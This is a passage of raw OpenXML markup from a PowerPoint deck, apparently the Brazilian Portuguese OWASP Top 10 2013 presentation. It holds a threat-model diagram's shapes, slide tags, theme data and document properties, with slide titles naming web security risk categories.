              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="43" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="145" y="1344"/>
                  <a:ext cx="190" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050" algn="ctr">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="44" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>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45" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>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46" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>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sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1633"/>
                  <a:ext cx="288" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr fontAlgn="auto">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1309572" y="1078361"/>
                <a:ext cx="838244" cy="357076"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrowCallout">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 20889"/>
                  <a:gd name="adj2" fmla="val 24667"/>
                  <a:gd name="adj3" fmla="val 34667"/>
                  <a:gd name="adj4" fmla="val 8013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Vetores </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> de Ataque</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800666" y="1049795"/>
                <a:ext cx="685836" cy="428491"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 250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r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> Impactos</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>  Técnicos</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="37" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="761855" y="1262453"/>
                <a:ext cx="535016" cy="1588"/>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38" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2189093" y="1262453"/>
                <a:ext cx="630270" cy="1588"/>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39" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="32" idx="3"/>
                <a:endCxn id="36" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3900507" y="1264041"/>
                <a:ext cx="900159"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sp>
            <p:nvSpPr>
              <p:cNvPr id="40" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="14975" y="1322855"/>
                <a:ext cx="1132100" cy="199673"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Agentes </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>de </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Ameaça</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="41" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923088" y="1073600"/>
                <a:ext cx="762040" cy="380881"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impactos</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>no Negócio</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="42" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="36" idx="4"/>
                <a:endCxn id="41" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486502" y="1264041"/>
                <a:ext cx="436586"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
          <p:nvSpPr>
            <p:cNvPr id="30" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879691" y="1090772"/>
              <a:ext cx="220675" cy="380881"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 47538"/>
                <a:gd name="adj2" fmla="val 51293"/>
                <a:gd name="adj3" fmla="val 57006"/>
                <a:gd name="adj4" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>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eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2862228" y="1235189"/>
              <a:ext cx="109543" cy="9522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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45884854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03/02/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag10.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="06/24/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag11.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag12.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag13.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag14.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag15.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag16.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/20/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag17.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag18.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/31/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag19.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/02/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag20.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/13/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/19/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/02/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag5.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/02/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag6.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/03/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/13/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/13/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag9.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/03/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
  <a:themeElements>
    <a:clrScheme name="Aspect Mod">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3A6331"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="8DC18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68472</TotalTime>
  <Words>9444</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Apresentação na tela (4:3)</PresentationFormat>
  <Paragraphs>1070</Paragraphs>
  <Slides>23</Slides>
  <Notes>22</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>Tema</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Títulos de slides</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>23</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="24" baseType="lpstr">
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Apresentação do PowerPoint</vt:lpstr>
      <vt:lpstr>Versão PT-BR</vt:lpstr>
      <vt:lpstr>Sobre a OWASP</vt:lpstr>
      <vt:lpstr>Introdução</vt:lpstr>
      <vt:lpstr>Notas da Versão</vt:lpstr>
      <vt:lpstr>Riscos de Segurança em Aplicações</vt:lpstr>
      <vt:lpstr>OWASP Top 10 Riscos de Segurança em Aplicações – 2013 </vt:lpstr>
      <vt:lpstr>Injeção</vt:lpstr>
      <vt:lpstr>Quebra de Autenticação e Gerenciamento de Sessão</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Referência Insegura e Direta a Objetos</vt:lpstr>
      <vt:lpstr>Configuração Incorreta de Segurança</vt:lpstr>
      <vt:lpstr>Exposição de Dados Sensíveis</vt:lpstr>
      <vt:lpstr>Falta de Função para Controle do Nível de Acesso</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Utilização de Componentes Vulneráveis Conhecidos</vt:lpstr>
      <vt:lpstr>Redirecionamentos e Encaminhamentos Inválidos</vt:lpstr>
      <vt:lpstr>Próximos Passos para Desenvolvedores</vt:lpstr>
      <vt:lpstr>Próximos Passos para Verificadores</vt:lpstr>
      <vt:lpstr>Próximos Passos para Organizações</vt:lpstr>
      <vt:lpstr>Notas Sobre Riscos</vt:lpstr>
      <vt:lpstr>Detalhes Sobre Fatores de Risco</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OWASP Top 10 - 2013</dc:title>
  <dc:subject>The Top 10 Most Critical Web Application Security Risks</dc:subject>
  <dc:creator>Dave Wichers</dc:creator>
  <cp:keywords>Web Application Security, Top 10, XSS, CSRF, SQL Injection</cp:keywords>
  <cp:lastModifiedBy>Machry</cp:lastModifiedBy>
  <cp:revision>949</cp:revision>
  <cp:lastPrinted>2013-02-06T21:03:34Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-17T12:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-08-31T20:14:01Z</dcterms:modified>
  <cp:contentStatus>FINAL</cp:contentStatus>
</cp:coreProperties>
</file>